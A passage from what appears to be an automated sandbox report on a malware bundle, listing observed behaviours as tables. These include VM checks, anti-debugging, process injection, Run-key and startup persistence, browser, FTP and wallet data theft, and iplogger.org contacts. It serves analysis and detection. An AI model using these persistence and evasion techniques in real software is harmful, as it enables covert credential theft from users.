| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\Documents\GuardFox\NnROE5b4OASR13ERwrphVqIv.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\7zS2229.tmp\Install.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | C:\Users\Admin\AppData\Local\Temp\setup.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | C:\Users\Admin\AppData\Local\Temp\setup.exe | N/A |
Checks computer location settings
| Description | Indicator | Process | Target |
|---|---|---|---|
| Key value queried | \REGISTRY\USER\S-1-5-21-1790404759-2178872477-2616469472-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\setup.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-1790404759-2178872477-2616469472-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\Documents\GuardFox\f0_8GJMbJWHKd0bn8qAoSGuv.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-1790404759-2178872477-2616469472-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\7zS2229.tmp\Install.exe | N/A |
Drops startup file
| Description | Indicator | Process | Target |
|---|---|---|---|
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\PowerExpertNT.lnk | C:\Users\Admin\Documents\GuardFox\w6rxdZKVGKZ4S99sMhSfXG4z.exe | N/A |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\qemu-ga.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\MsBuild.exe | N/A |
Executes dropped EXE
Identifies Wine through registry keys
| Description | Indicator | Process | Target |
|---|---|---|---|
| Key opened | \REGISTRY\USER\S-1-5-21-1790404759-2178872477-2616469472-1000\Software\Wine | C:\Users\Admin\Documents\GuardFox\S7BJFj0JPGuOIK5ke2EiWzRe.exe | N/A |
Loads dropped DLL
| Description | Indicator | Process | Target |
|---|---|---|---|
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\is-S0TH8.tmp\evl5AhAqx92wdfRi532WmaQN.tmp | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\is-S0TH8.tmp\evl5AhAqx92wdfRi532WmaQN.tmp | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\is-S0TH8.tmp\evl5AhAqx92wdfRi532WmaQN.tmp | N/A |
| N/A | N/A | C:\Users\Admin\Documents\GuardFox\zVlqImu7G3G4sPmxLZrutQJQ.exe | N/A |
| N/A | N/A | C:\Users\Admin\Documents\GuardFox\zVlqImu7G3G4sPmxLZrutQJQ.exe | N/A |
| N/A | N/A | C:\Users\Admin\Documents\GuardFox\AKDaZLMxwKvUY2U0BxfH0RwL.exe | N/A |
Modifies file permissions
| Description | Indicator | Process | Target |
|---|---|---|---|
| N/A | N/A | C:\Windows\SysWOW64\icacls.exe | N/A |
Reads data files stored by FTP clients
Reads user/profile data of web browsers
Themida packer
| Description | Indicator | Process | Target |
|---|---|---|---|
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Accesses cryptocurrency files/wallets, possible credential harvesting
Adds Run key to start application
| Description | Indicator | Process | Target |
|---|---|---|---|
| Set value (str) | \REGISTRY\USER\S-1-5-21-1790404759-2178872477-2616469472-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ExtreamFanV5 = "C:\\Users\\Admin\\AppData\\Local\\ExtreamFanV5\\ExtreamFanV5.exe" | C:\Users\Admin\Documents\GuardFox\w6rxdZKVGKZ4S99sMhSfXG4z.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1790404759-2178872477-2616469472-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\SysHelper = "\"C:\\Users\\Admin\\AppData\\Local\\60fd73a9-b566-4ebe-bf13-7efa1ba8c839\\f0_8GJMbJWHKd0bn8qAoSGuv.exe\" --AutoStart" | C:\Users\Admin\Documents\GuardFox\f0_8GJMbJWHKd0bn8qAoSGuv.exe | N/A |
Checks installed software on the system
Checks whether UAC is enabled
| Description | Indicator | Process | Target |
|---|---|---|---|
| Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | C:\Users\Admin\AppData\Local\Temp\setup.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | C:\Users\Admin\Documents\GuardFox\NnROE5b4OASR13ERwrphVqIv.exe | N/A |
Drops Chrome extension
| Description | Indicator | Process | Target |
|---|---|---|---|
| File created | C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\eciaojnpihmgkbacgpjnimcpkfeklgag\1.0.5_0\manifest.json | C:\Windows\SYSTEM32\schtasks.exe | N/A |
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
|---|---|---|---|
| N/A | iplogger.org | N/A | N/A |
| N/A | iplogger.org | N/A | N/A |
| N/A | iplogger.org | N/A | N/A |
Looks up external IP address via web service
| Description | Indicator | Process | Target |
|---|---|---|---|
| N/A | ipinfo.io | N/A | N/A |
| N/A | api.myip.com | N/A | N/A |
| N/A | api.myip.com | N/A | N/A |
| N/A | ipinfo.io | N/A | N/A |
| N/A | api.2ip.ua | N/A | N/A |
| N/A | ipinfo.io | N/A | N/A |
| N/A | api.2ip.ua | N/A | N/A |
| N/A | api.myip.com | N/A | N/A |
| N/A | ipinfo.io | N/A | N/A |
Drops file in System32 directory
| Description | Indicator | Process | Target |
|---|---|---|---|
| File opened for modification | C:\Windows\System32\GroupPolicy | C:\Users\Admin\AppData\Local\Temp\setup.exe | N/A |
| File created | C:\Windows\System32\GroupPolicy\Machine\Registry.pol | C:\Users\Admin\AppData\Local\Temp\setup.exe | N/A |
| File opened for modification | C:\Windows\System32\GroupPolicy\GPT.INI | C:\Users\Admin\AppData\Local\Temp\setup.exe | N/A |
| File opened for modification | C:\Windows\System32\GroupPolicy | C:\Windows\SYSTEM32\schtasks.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\GroupPolicy\gpt.ini | C:\Windows\SYSTEM32\schtasks.exe | N/A |
| File opened for modification | C:\Windows\system32\GroupPolicy\gpt.ini | C:\Users\Admin\AppData\Local\Temp\7zS2229.tmp\Install.exe | N/A |
| File opened for modification | C:\Windows\System32\GroupPolicy\gpt.ini | C:\Users\Admin\AppData\Local\Temp\setup.exe | N/A |
| File opened for modification | C:\Windows\System32\GroupPolicy\Machine\Registry.pol | C:\Windows\SYSTEM32\schtasks.exe | N/A |
| File opened for modification | C:\Windows\System32\GroupPolicy\GPT.INI | C:\Windows\SYSTEM32\schtasks.exe | N/A |
Suspicious use of NtSetInformationThreadHideFromDebugger
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\setup.exe | N/A |
| N/A | N/A | C:\Users\Admin\Documents\GuardFox\S7BJFj0JPGuOIK5ke2EiWzRe.exe | N/A |
| N/A | N/A | C:\Users\Admin\Documents\GuardFox\NnROE5b4OASR13ERwrphVqIv.exe | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 5984 set thread context of 748 | N/A | C:\Users\Admin\Documents\GuardFox\f0_8GJMbJWHKd0bn8qAoSGuv.exe | C:\Users\Admin\Documents\GuardFox\f0_8GJMbJWHKd0bn8qAoSGuv.exe |
| PID 2932 set thread context of 5168 | N/A | C:\Users\Admin\Documents\GuardFox\SBv9uOfXRyyWp_0lKyUFY2zJ.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe |
| PID 5020 set thread context of 5204 | N/A | C:\Users\Admin\Documents\GuardFox\f0_8GJMbJWHKd0bn8qAoSGuv.exe | C:\Users\Admin\Documents\GuardFox\f0_8GJMbJWHKd0bn8qAoSGuv.exe |
| PID 6052 set thread context of 2780 | N/A | C:\Users\Admin\Documents\GuardFox\AKDaZLMxwKvUY2U0BxfH0RwL.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\MsBuild.exe |
Drops file in Program Files directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Program Files\Google\Chrome\Application\debug.log | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| File opened for modification | C:\Program Files\Google\Chrome\Application\106.0.5249.119\debug.log | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
Launches sc.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\sc.exe | N/A |
Enumerates physical storage devices
Program crash
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Users\Admin\Documents\GuardFox\f0_8GJMbJWHKd0bn8qAoSGuv.exe |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Users\Admin\Documents\GuardFox\jfuVd2Wxxnz6tzydAf9H8i_Y.exe |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Users\Admin\Documents\GuardFox\zVlqImu7G3G4sPmxLZrutQJQ.exe |
Checks SCSI registry key(s)
| Description | Indicator | Process | Target |
| Key enumerated | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\Documents\GuardFox\K0NNvWiVJgVgRj4wsXiZz39s.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\Documents\GuardFox\K0NNvWiVJgVgRj4wsXiZz39s.exe | N/A |
| Key queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | C:\Users\Admin\Documents\GuardFox\K0NNvWiVJgVgRj4wsXiZz39s.exe | N/A |
Checks processor information in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\Users\Admin\Documents\GuardFox\zVlqImu7G3G4sPmxLZrutQJQ.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Users\Admin\Documents\GuardFox\zVlqImu7G3G4sPmxLZrutQJQ.exe | N/A |
Creates scheduled task(s)
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SYSTEM32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SYSTEM32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\schtasks.exe | N/A |
Enumerates system info in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Users\Admin\AppData\Local\Temp\7zS2229.tmp\Install.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Users\Admin\AppData\Local\Temp\7zS2229.tmp\Install.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
Modifies data under HKEY_USERS
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-361 = "GTB Daylight Time" | C:\Users\Admin\Documents\GuardFox\VITLpmgdrZSEsfnjjCSHaEDR.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-112 = "Eastern Standard Time" | C:\Users\Admin\Documents\GuardFox\VITLpmgdrZSEsfnjjCSHaEDR.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-1841 = "Russia TZ 4 Daylight Time" | C:\Users\Admin\Documents\GuardFox\VITLpmgdrZSEsfnjjCSHaEDR.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-562 = "SE Asia Standard Time" | C:\Users\Admin\Documents\GuardFox\VITLpmgdrZSEsfnjjCSHaEDR.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-751 = "Tonga Daylight Time" | C:\Users\Admin\Documents\GuardFox\VITLpmgdrZSEsfnjjCSHaEDR.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed | C:\Windows\SysWOW64\reg.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-2041 = "Eastern Daylight Time (Mexico)" | C:\Users\Admin\Documents\GuardFox\VITLpmgdrZSEsfnjjCSHaEDR.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-272 = "Greenwich Standard Time" | C:\Users\Admin\Documents\GuardFox\VITLpmgdrZSEsfnjjCSHaEDR.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-1832 = "Russia TZ 2 Standard Time" | C:\Users\Admin\Documents\GuardFox\VITLpmgdrZSEsfnjjCSHaEDR.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-341 = "Egypt Daylight Time" | C:\Users\Admin\Documents\GuardFox\VITLpmgdrZSEsfnjjCSHaEDR.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-2792 = "Novosibirsk Standard Time" | C:\Users\Admin\Documents\GuardFox\VITLpmgdrZSEsfnjjCSHaEDR.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs | C:\Windows\SysWOW64\reg.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-452 = "Caucasus Standard Time" | C:\Users\Admin\Documents\GuardFox\VITLpmgdrZSEsfnjjCSHaEDR.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-122 = "SA Pacific Standard Time" | C:\Users\Admin\Documents\GuardFox\VITLpmgdrZSEsfnjjCSHaEDR.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed | C:\Windows\SysWOW64\reg.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates | C:\Windows\SysWOW64\reg.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-448 = "Azerbaijan Daylight Time" | C:\Users\Admin\Documents\GuardFox\VITLpmgdrZSEsfnjjCSHaEDR.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-772 = "Montevideo Standard Time" | C:\Users\Admin\Documents\GuardFox\VITLpmgdrZSEsfnjjCSHaEDR.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-2411 = "Marquesas Daylight Time" | C:\Users\Admin\Documents\GuardFox\VITLpmgdrZSEsfnjjCSHaEDR.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-364 = "Middle East Daylight Time" | C:\Users\Admin\Documents\GuardFox\VITLpmgdrZSEsfnjjCSHaEDR.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-12 = "Azores Standard Time" | C:\Users\Admin\Documents\GuardFox\VITLpmgdrZSEsfnjjCSHaEDR.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-661 = "Cen. Australia Daylight Time" | C:\Users\Admin\Documents\GuardFox\VITLpmgdrZSEsfnjjCSHaEDR.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-1721 = "Libya Daylight Time" | C:\Users\Admin\Documents\GuardFox\VITLpmgdrZSEsfnjjCSHaEDR.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-2872 = "Magallanes Standard Time" | C:\Users\Admin\Documents\GuardFox\VITLpmgdrZSEsfnjjCSHaEDR.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-391 = "Arab Daylight Time" | C:\Users\Admin\Documents\GuardFox\VITLpmgdrZSEsfnjjCSHaEDR.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-732 = "Fiji Standard Time" | C:\Users\Admin\Documents\GuardFox\VITLpmgdrZSEsfnjjCSHaEDR.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-434 = "Georgian Daylight Time" | C:\Users\Admin\Documents\GuardFox\VITLpmgdrZSEsfnjjCSHaEDR.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-365 = "Middle East Standard Time" | C:\Users\Admin\Documents\GuardFox\VITLpmgdrZSEsfnjjCSHaEDR.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-462 = "Afghanistan Standard Time" | C:\Users\Admin\Documents\GuardFox\VITLpmgdrZSEsfnjjCSHaEDR.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-652 = "AUS Central Standard Time" | C:\Users\Admin\Documents\GuardFox\VITLpmgdrZSEsfnjjCSHaEDR.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-2941 = "Sao Tome Daylight Time" | C:\Users\Admin\Documents\GuardFox\VITLpmgdrZSEsfnjjCSHaEDR.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-1502 = "Turkey Standard Time" | C:\Users\Admin\Documents\GuardFox\VITLpmgdrZSEsfnjjCSHaEDR.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-202 = "US Mountain Standard Time" | C:\Users\Admin\Documents\GuardFox\VITLpmgdrZSEsfnjjCSHaEDR.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA | C:\Windows\SysWOW64\reg.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-1022 = "Bangladesh Standard Time" | C:\Users\Admin\Documents\GuardFox\VITLpmgdrZSEsfnjjCSHaEDR.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-2342 = "Haiti Standard Time" | C:\Users\Admin\Documents\GuardFox\VITLpmgdrZSEsfnjjCSHaEDR.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-181 = "Mountain Daylight Time (Mexico)" | C:\Users\Admin\Documents\GuardFox\VITLpmgdrZSEsfnjjCSHaEDR.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-92 = "Pacific SA Standard Time" | C:\Users\Admin\Documents\GuardFox\VITLpmgdrZSEsfnjjCSHaEDR.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-215 = "Pacific Standard Time (Mexico)" | C:\Users\Admin\Documents\GuardFox\VITLpmgdrZSEsfnjjCSHaEDR.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-2572 = "Turks and Caicos Standard Time" | C:\Users\Admin\Documents\GuardFox\VITLpmgdrZSEsfnjjCSHaEDR.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-2182 = "Astrakhan Standard Time" | C:\Users\Admin\Documents\GuardFox\VITLpmgdrZSEsfnjjCSHaEDR.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-162 = "Central Standard Time" | C:\Users\Admin\Documents\GuardFox\VITLpmgdrZSEsfnjjCSHaEDR.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (int) | \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-722 = "Central Pacific Standard Time" | C:\Users\Admin\Documents\GuardFox\VITLpmgdrZSEsfnjjCSHaEDR.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-2372 = "Easter Island Standard Time" | C:\Users\Admin\Documents\GuardFox\VITLpmgdrZSEsfnjjCSHaEDR.exe | N/A |
| Set value (str) | \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\22\52C64B7E\C:\Windows\system32\,@tzres.dll,-2571 = "Turks and Caicos Daylight Time" | C:\Users\Admin\Documents\GuardFox\VITLpmgdrZSEsfnjjCSHaEDR.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key created | \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ | C:\Users\Admin\AppData\Local\Temp\setup.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ | C:\Users\Admin\Documents\GuardFox\f0_8GJMbJWHKd0bn8qAoSGuv.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: MapViewOfSection
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\Documents\GuardFox\K0NNvWiVJgVgRj4wsXiZz39s.exe | N/A |
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
